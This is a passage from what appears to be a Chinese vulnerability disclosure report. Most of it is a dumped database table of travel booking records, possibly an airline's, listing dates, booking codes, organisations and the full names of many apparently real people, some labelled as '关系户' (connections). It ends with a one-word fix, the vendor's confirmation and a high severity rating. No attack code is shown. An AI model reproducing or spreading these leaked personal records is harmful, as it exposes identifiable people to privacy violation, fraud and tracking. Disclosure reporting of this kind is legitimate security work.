| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | ONWIMON NACHATTREE           | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | RAWEEWAT PHATCHAREE          | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | CHAINITHISUPHAKON KOPKRIT    | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 钱丽萍                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 沙昊旻                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 毕谢庆                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 陈峰云                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 陈士珍                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 陈祖东                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 范建伟                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 方菊妹                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 方佩宇                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 费西华                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 封梅                           | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 龚龙芳                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 顾能能                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 胡庆琳                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 蔡程娥                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 陈福妹                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 陈丽珍                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 陈鸣明                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 陈元德                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 陈征                           | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 杜伟利                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 胡永娟                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 倪明德                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 潘功臣                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 彭秋林                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 乔坚华                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 施惠妹                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 杜雅玲                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 金永清                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 林于蓝                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 刘晓滢                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 唐金凤                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 袁卫红                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 俞华                           | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 俞晏平                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 张水英                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 周剑                           | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 苏文                           | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 孙华静                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 谭嘉英                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 唐新娟                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 王芳                           | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 王豪杰                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 王银燕                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 韦巍                           | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 吴惠莉                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 王平儿                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 黄建荣                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 姜强                           | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 金霞                           | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 李凤仙                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 李景辉                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 刘海军                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 刘秀龙                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 陆伟兵                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 马菊芳                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 马骏                           | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 马兴媛                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 倪喜珍                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 邵宏磊                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 沈振丽                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 施云峰                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 陈锡鹏                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 陈燕                           | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 邓群芳                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 翟红梅                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 郭红梅                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 韩建萍                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 洪志琴                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 黄菊花                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 刘兴红                          | 22-OCT-12 |
| 03-NOV-12  | 9C8823   | 遵义机场财务部长   | 1        | 王芳                           | 03-NOV-12 |
| 03-NOV-12  | 9C8823   | 遵义机场财务部长   | 1        | 吴多群                          | 03-NOV-12 |
| 10-NOV-12  | 9C8829   | NULL       | 0        | 吴冬                           | 10-NOV-12 |
| 10-NOV-12  | 9C8921   | 财富人生       | 1        | WUYING                       | 10-NOV-12 |
| 10-NOV-12  | 9C8921   | 财富人生       | 1        | LIYINAN                      | 10-NOV-12 |
| 10-NOV-12  | 9C8921   | 财富人生剧组     | 1        | CHENXI                       | 10-NOV-12 |
| 10-NOV-12  | 9C8921   | 财富人生       | 1        | SHIMINJIE                    | 10-NOV-12 |
| 10-NOV-12  | 9C8921   | 财富人生       | 1        | HANHUINI                     | 10-NOV-12 |
| 10-NOV-12  | 9C8921   | 财富人生剧组     | 1        | GUGUOJIE                     | 10-NOV-12 |
| 14-NOV-12  | 9C8976   | 河北财政厅      | 0        | 齐守印                          | 14-NOV-12 |
| 14-NOV-12  | 9C8976   | 河北财政厅      | 0        | 胡德仁                          | 14-NOV-12 |
| 14-NOV-12  | 9C8976   | 河北财政厅      | 0        | 池孟江                          | 14-NOV-12 |
| 14-NOV-12  | 9C8976   | 河北财政       | 0        | 周巧娥                          | 14-NOV-12 |
| 08-DEC-12  | 9C8959   | 欧美部关系户     | 1        | LO WONG SAIYING SYLVIA       | 08-DEC-12 |
| 08-DEC-12  | 9C8959   | 欧美部        | 1        | LO AARON SAIPING             | 08-DEC-12 |
| 09-DEC-12  | 9C8959   | 欧美部关系户     | 0        | LO WONG SAIYING SYLVIA       | 09-DEC-12 |
| 09-DEC-12  | 9C8959   | 欧美部        | 0        | LO AARON SAIPING             | 09-DEC-12 |
| 14-DEC-12  | 9C8580   | 涂料公司       | 1        | WANG PENG                    | 14-DEC-12 |
| 14-DEC-12  | 9C8580   | 涂料公司       | 1        | ZHOU DAN                     | 14-DEC-12 |
| 14-DEC-12  | 9C8580   | 涂料公司       | 1        | CHEN JUN                     | 14-DEC-12 |
| 14-DEC-12  | 9C8580   | 涂料公司       | 1        | HU FEI                       | 14-DEC-12 |
| 14-DEC-12  | 9C8580   | 涂料公司       | 1        | WANG SONGLIN                 | 14-DEC-12 |
| 14-DEC-12  | 9C8580   | 涂料公司       | 1        | LI GANG                      | 14-DEC-12 |
| 14-DEC-12  | 9C8580   | 涂料公司       | 1        | TAN YANG                     | 14-DEC-12 |
| 14-DEC-12  | 9C8580   | 涂料公司       | 1        | YUAN YANI                    | 14-DEC-12 |
| 26-OCT-12  | 9C8899   | 河北省电信局     | 0        | 马冀民                          | 26-OCT-12 |
| 26-OCT-12  | 9C8936   | 建信人寿保险有限公司 | 0        | 沈芸筠                          | 26-OCT-12 |
| 26-OCT-12  | 9C8936   | 建信人寿保险有限公司 | 0        | 张秀珍                          | 26-OCT-12 |
| 26-OCT-12  | 9C8936   | 建信人寿保险有限公司 | 0        | 沈宇清                          | 26-OCT-12 |
| 26-OCT-12  | 9C8936   | 建信人寿保险有限公司 | 0        | 卫丹波                          | 26-OCT-12 |
+------------+----------+------------+----------+------------------------------+-----------+

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-01-12 13:13

厂商回复:

已收到,谢谢

最新状态:

暂无

漏洞评价:

评论

  1. 2015-02-26 12:23 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    您的飞机票来了